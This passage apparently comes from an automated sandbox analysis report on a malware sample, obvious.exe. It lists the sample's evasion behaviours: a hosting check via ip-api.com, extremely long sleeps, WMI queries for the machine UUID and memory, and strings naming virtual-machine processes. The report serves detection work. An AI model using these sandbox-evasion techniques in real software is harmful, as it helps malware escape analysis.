Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\obvious.exe Memory allocated: 12F5F800000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Memory allocated: 12F79220000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 597281 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 597172 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596717 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596362 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596016 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595687 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595575 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595467 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594813 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594688 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594578 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594469 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594344 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594234 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594125 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594013 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593906 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593797 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593684 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593578 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593469 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593344 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593234 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593123 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593014 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592906 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592797 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592688 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592563 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592438 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592328 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592219 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592094 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 591984 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 591875 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 591766 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\obvious.exe Window / User API: threadDelayed 6143 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Window / User API: threadDelayed 3699 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3963 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5835 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2997 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 377 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4996 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1629 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4241 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1792 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 999
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -597281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -597172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -597047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -596937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -596828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -596717s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -596609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -596500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -596362s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -596234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -596125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -596016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -595906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -595796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -595687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -595575s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -595467s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -595063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -594922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -594813s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -594688s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -594578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -594469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -594344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -594234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -594125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -594013s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -593906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -593797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -593684s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -593578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -593469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -593344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -593234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -593123s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -593014s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -592906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -592797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -592688s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -592563s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -592438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -592328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -592219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -592094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -591984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -591875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe TID: 7568 Thread sleep time: -591766s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 Thread sleep count: 3963 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 Thread sleep count: 5835 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092 Thread sleep count: 2997 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092 Thread sleep count: 377 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228 Thread sleep count: 4996 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228 Thread sleep count: 1629 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652 Thread sleep count: 4241 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652 Thread sleep count: 1792 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep count: 2889 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep count: 999 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2852 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 597281 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 597172 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596717 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596362 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 596016 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595687 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595575 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595467 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594813 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594688 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594578 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594469 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594344 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594234 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594125 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 594013 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593906 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593797 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593684 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593578 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593469 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593344 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593234 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593123 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 593014 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592906 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592797 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592688 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592563 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592438 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592328 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592219 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 592094 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 591984 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 591875 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Thread delayed: delay time: 591766 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: obvious.exe, uGCIY.scr.0.dr Binary or memory string: vboxtray
Source: uGCIY.scr.0.dr Binary or memory string: vboxservice
Source: obvious.exe, uGCIY.scr.0.dr Binary or memory string: qemu-ga
Source: uGCIY.scr.0.dr Binary or memory string: vmwareuser
Source: obvious.exe, uGCIY.scr.0.dr Binary or memory string: vmusrvc
Source: uGCIY.scr.0.dr Binary or memory string: vmwareservice+discordtokenprotector
Source: uGCIY.scr.0.dr Binary or memory string: vmsrvc
Source: uGCIY.scr.0.dr Binary or memory string: vmtoolsd
Source: uGCIY.scr.0.dr Binary or memory string: vmwaretray
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61286000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareservice
